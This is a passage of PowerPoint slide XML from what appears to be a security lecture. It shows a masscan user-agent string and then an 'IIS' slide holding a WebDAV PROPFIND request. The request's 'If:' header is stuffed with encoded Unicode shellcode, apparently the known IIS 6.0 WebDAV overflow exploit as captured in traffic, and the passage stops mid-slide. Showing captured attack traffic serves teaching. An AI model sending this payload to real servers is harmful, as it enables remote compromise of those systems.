                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>masscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/1.0 (https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>robertdavidgraham</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>masscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4515572A-FF12-AD49-A9CB-FACCBA0AC613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D4813D4-4A5F-974C-ABDD-0388955659E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76796F80-129A-ED45-B459-031978F9D252}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7514748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C2E28-102F-D342-B2BD-F1EB969FBB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC18AF55-8195-4C4B-8979-C8F61AA925E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="32500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PROPFIND / HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: localhost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: Close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Length: 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If: &lt;http://localhost/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aaaaaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>潨硣睡焳椶䝲稹䭷佰畓穏䡨噣浔桅㥓偬啧杣㍤䘰硅楒吱䱘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>橑牁䈱瀵塐㙤汇㔹呪倴呃睒偡㈲测水㉇扁㝍兡塢䝳剐㙰畄桪㍴乊硫䥶乳䱪坺潱塊㈰㝮䭉前䡣</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>潌畖畵景癨䑍偰稶手敗畐橲穫睢癘扈攱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ご</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>汹偊呢倳㕷橷䅄㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ȂȂ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="am-ET" dirty="0">
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ዀ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栃汄剖䬷汭佘塚祐䥪塏䩒䅐晍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="chr-Cher-US" dirty="0">
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ꮐ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栃䠴攱潃湦瑁䍬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="chr-Cher-US" dirty="0">
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ꮐ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栃千橁灒㌰塦䉌灋捆关祁穐䩬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Not &lt;locktoken:write1&gt;) &lt;http://localhost/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bbbbbbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>祈慵佃潧歯䡅㙆杵䐳㡱坥婢吵噡楒橓兗㡎奈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>捕䥱䍤摲㑨䝘煹㍫歕浈偏穆㑱潔瑃奖潯獁㑗慨穲㝅䵉坎呈䰸㙺㕲扦湃䡭㕈慷䵚慴䄳䍥割浩㙱</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>乤渹捓此兆估硯牓材䕓穣焹体䑖漶獹桷穖慊㥅㘹氹䔱㑲卥塊䑎穄氵婖扁湲昱奙吳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ㅂ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>塥奁煐〶</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>坷䑗卡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="chr-Cher-US" dirty="0">
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ꮐ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栃湏栀湏栀䉇癪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="chr-Cher-US" dirty="0">
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ꮐ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>넓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ㅶ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>湯ⓣ栁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="iu-Cans-CA" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ᑠ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栃̀翾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ffff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ffff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="chr-Cher-US" dirty="0">
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ꮐ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Cyrl-AZ" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ѯ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栃煮瑰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="iu-Cans-CA" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ᐴ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栃⧧栁鎑栀㤱普䥕</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>げ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>呫癫牊祡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="iu-Cans-CA" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ᐜ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栃清栀眲票䵩㙬䑨䵰艆栀䡷㉓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ᶪ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栂潪䌵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="chr-Cher-US" dirty="0">
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ᏸ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>栃⧧栁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
